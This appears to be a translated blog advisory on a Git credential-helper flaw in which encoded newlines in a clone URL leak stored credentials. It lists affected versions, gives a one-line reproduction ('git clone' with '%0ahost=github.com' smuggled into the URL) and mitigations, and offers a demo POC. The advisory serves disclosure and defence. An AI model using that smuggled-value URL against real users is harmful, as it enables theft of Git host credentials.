I. Vulnerability description
Git uses the Credential Helper to help users store and retrieve credentials. However, when a URL contains an encoded newline character, unexpected values may be injected into the credential Helper protocol flow. This will trick the malicious URL into sending the host credentials to the attacker. This vulnerability is triggered when the Git clone command is executed against a malicious URL using the affected version of Git.
Ii. Relevant versions
Affected version
X <= 2.18.2 Git 2.19.x <= 2.19.3 Git 2.20.x <= 2.20.2 Git 2.21.x <= 2.21.1 Git 2.22.x <= X <= 2.24.1 Git 2.25.x <= 2.25.2 Git 2.26.x <= 2.26.0Copy the codeUnaffected version
Git 2.18.4 Git 2.19.4 Git 2.20.3 Git 2.21.2 Git 2.22.3 Git 2.23.2 Git 2.24.2 Git 2.25.3 Git 2.26.1Copy the codeIii. Vulnerability recurrence demonstration
When git executes a command such as “git clone example.com”, it requests the protocol “HTTPS” to store credentials for host “example.com” and appends the returned credentials to the outgoing request when the remote side requests authentication
git clone 'http://localhost:8088/%0ahost=github.com%0aprotocol=https'
Copy the codeExecuting a clone project
Git credentials have been obtained
4. Vulnerability repair
A new version has been released that fixes the bug and affected users are advised to download the update as soon as possible.
Github.com/git/git/rel…
In addition, there are other ways to solve or circumvent the problem:
1. Disable credential Helper
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Copy the code2. Beware of malicious urls
1) git clone check whether there are encoded newlines (%0a) or evidence of credential protocol injection (e.g. Host=github.com)
2) Avoid using submodules with untrusted repositories (do not use Clone – recurse-submodules; Use git subModule update only after checking.gitModules for the URL).
3) Avoid git clone for untrusted urls.
Reference links:
blog.nsfocus.net/git-0416/
Bugs.chromium.org/p/project-z…
Github.com/brompwnie/c…
Github.com/sv3nbeast/C…
You can reply “git” to obtain the demo POC
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
The public no. :
Thelostworld:
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…
This article uses the article synchronization assistant to synchronize